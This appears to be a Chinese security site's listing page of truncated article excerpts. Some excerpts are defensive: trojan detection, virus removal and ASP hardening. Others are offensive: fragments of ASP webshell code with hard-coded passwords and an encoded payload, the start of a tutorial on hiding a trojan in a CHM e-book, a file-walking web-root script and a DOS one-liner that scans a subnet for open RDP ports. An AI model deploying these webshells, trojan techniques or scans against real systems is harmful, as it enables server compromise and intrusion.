<%Server.ScriptTimeout=999999999Response.Buffer =trueOn Error Resume NextUserPass="643617"                           ’密码mName="BY:.尐飛" &n...

<%Const userPassword = "testit" ’’登录密码hu="琳琳5(63216(P:5,7(BD^2省略很多function UnEncode(temp)but=34for i = 1 to len(temp)    if mid(temp,i,1)<> "琳" thenIf Asc(Mid(temp, i, 1)) < 32&n...

说起CHM格式的电子书，可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中，杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗？今天笔者就以实例形式和大家一道分析一下。 　　Step1:要想制作一个完美的CHM木马，当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop。　　当然了，作为木马程序的载体，一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。　　Step2:首先运行windows.c...

目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。　　一、使用FileSystemObject组件 　　FileSystemObject可以对文件进行常规操作 　　可以通过修改注册表，将此组件改名，来防止此类木马的危害。 　　HKEY_CLASSES_ROOT\Scripting.FileSystemObject\ 　　改名为其它的名字，如：改为FileSystemObject_ChangeName 　　自己以后调用的时候使用这个就可以正常调用此组件了 　　也要将clsid值也改一下 　　HKEY_CLASS...

随着人们安全意识的提高，木马的生存越来越成为问题，木马种植者当然不甘心木马就这样被人所发觉，于是他们想出许多办法来伪装隐藏自己的行为，利用WinRAR捆绑木马就是其中的手段之一。那么我们怎么才能识别出其中藏有木马呢？本文讲述的正是这个问题。    攻击者可以把木马和其他可执行文件，比方说Flash动画放在同一个文件夹下，然后将这两个文件添加到档案文件中，并将文件制作为exe格式的自释放文件，这样，当你双击这个自释放文件时，就会在启动Flash动画等文件的同时悄悄地运行木马文件！这样就达到了木马种植者的目的，即运行木马服务端程序。而这一招效果又非常好，令对...

[%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]％] [%_repeat_0%]   SXS.EXE这是一个盗取QQ帐号密码的木马病毒，特点是可以通过可移动磁盘传播。该病毒的主要危害是盗取QQ帐户和密码；该病毒还会结束大量反病毒软件，降低系统的安全等级。 中毒症状：电脑分区双击不能自动打开或者很难打开，用右键打开可以！这是最显见的症状！ 解决方式：网上已经有很多手动删除的方式！ 现在有个最...

在我的C盘WINDOWS根目录下多了一个MDM.EXE文件,每次删除之后会自动生成,并产生一个名为SVCHOST的进程,而且自从中了这个以后,我的所有文件夹都不可见了,即使在设置中选择"显示所有文件和文件夹",关掉"隐藏受保护的系统文件"也没用.这是怎么回事? 　　这个病毒我昨天遇倒了!最后问题解决了(当然不是格式化硬盘哈) 　　中了这个病毒以后,在各个分区的根目录下会生成两个文件,分别是autorun.inf 和ravmon.exe(这个文件比较大的)并且属性为隐藏属性,且在c:\windows下会生成MDM.exe 和svchost.exe,svch...

具体问题是这样的.卡巴杀出这些木马程序,但是我发现在"系统配置实用程序"里面的"启动"选项里面,有一些东西((可能最开始是病毒文件)).比如说, C;DOCUME~1\Acer\LOCALS~1\Temp\wgso.exe. C;DOCUME~1\Acer\LOCALS~1\Temp\wlso.exe. C;DOCUME~1\Acer\LOCALS~1\Temp\wmso.exe. C;DOCUME~1\Acer\LOCALS~1\Temp\woso.exe. C;DOCUME~1\Acer\LOCALS~1\Temp\ztso.exe&nbs...

不需要任何工具,dos命令扫描一个网段的全部端口! 　　在win2000下开一个dos窗口，然后执行 for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 这条命令执行后 会在任务栏开254个小窗口 然后telnet链接失败的窗口会在大约5秒后自动退出 剩下的窗口就是相...

增加屏蔽:  16a.us    www.nice8.org    更新对新的木马的查杀,修改结束进程模块.本来这个专杀只是玩VBS时做的一个拙品,但是看到有人还在提醒我木马群更新,专杀杀不干净的时候我就又再次更新了.需要的朋友就继续关注这里的更新吧.送佛送到西....vbs文件[code]on error resume nextmsgbox "本专杀由[G-AVR]Gryesign提供，请关注BLOG及时更新专杀---http://hi.baidu.co...

<%dim phdim intfileserver.ScriptTimeout = 600ph=server.mappath("/") Sub InsertAllFiles(Path)Set FSO = CreateObject("Scripting.FileSystemObject")on error resume next Set f = FSO.GetFolder(Path)Set fc2 = ...